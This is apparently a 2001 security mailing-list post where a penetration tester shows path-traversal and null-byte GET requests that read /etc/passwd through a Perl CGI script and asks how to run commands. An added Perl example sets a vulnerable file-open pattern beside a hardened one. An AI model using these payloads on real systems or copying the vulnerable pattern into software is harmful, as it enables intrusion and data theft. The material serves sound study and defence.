Hi, I'm doing a pen test and I found a Perl script which seems to be vulnerable. If I do a GET, for example:

GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00

I can see the content of the passwd file. But when I try to execute a command, for example:

GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00

I get this garbage and some interesting stuff.

I'm not sure, but I think the %00 is the problem, and without %00 I get no results. Does anybody know how I can execute my commands? I tried ; and , but nothing happened. I'm not able to see the source of the Perl file. Any help would be appreciated.

otaner

--
GMX - The communication platform on the Internet. http://www.gmx.net

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
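The behaviour described in the post (a %00 in a parameter letting the script open an arbitrary file, nothing without it) is the classic Perl CGI null-byte truncation. The following is an added example, not code from the original post or from the script under test: a vulnerable open() pattern beside a hardened one. The script layout, $DOCROOT and the parameter handling are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example (not from the original post): why a %00 in a CGI parameter
# lets a Perl script open an arbitrary file, and how to reject it.
# $DOCROOT and the sub names are assumptions for illustration.
use strict;
use warnings;
use Cwd qw(realpath);

my $DOCROOT = '/var/www/pages';   # assumed directory the script is meant to serve

# Vulnerable pattern: the script appends a fixed suffix and trusts it to
# restrict what can be opened. Perl keeps the NUL inside the string, but the
# C-level open() it calls stops at the NUL, so ".html" is never seen by the OS.
# (Perl 5.20 and later refuse pathnames containing NUL with a warning; old
# installations such as the one in the post silently truncate.)
sub open_page_vulnerable {
    my ($name) = @_;
    my $path = "$DOCROOT/$name.html";
    open(my $fh, '<', $path) or return undef;
    local $/; my $body = <$fh>; close $fh;
    return $body;
}

# Hardened version: reject NUL, allow only a safe character set (no '/',
# no '..'), and confirm the canonical path still lies under $DOCROOT.
sub open_page_safe {
    my ($name) = @_;
    return undef if $name =~ /\0/;                 # null-byte truncation
    return undef unless $name =~ /\A[\w-]+\z/;     # traversal and metachars
    my $path = realpath("$DOCROOT/$name.html") or return undef;
    return undef unless index($path, "$DOCROOT/") == 0;
    open(my $fh, '<', $path) or return undef;
    local $/; my $body = <$fh>; close $fh;
    return $body;
}

# URL-decoding %00 yields a literal NUL. For the vulnerable sub the path
# becomes "$DOCROOT/../../../../../../etc/passwd\0.html" and the OS sees only
# the part before the NUL. Constructed input, mirroring the post's request.
my $decoded = "../../../../../../etc/passwd\0";
print defined open_page_vulnerable($decoded) ? "vulnerable: file read\n"
                                             : "vulnerable: open failed\n";
print defined open_page_safe($decoded)       ? "safe: file read\n"
                                             : "safe: rejected\n";
```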
This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 10:54:21 PDT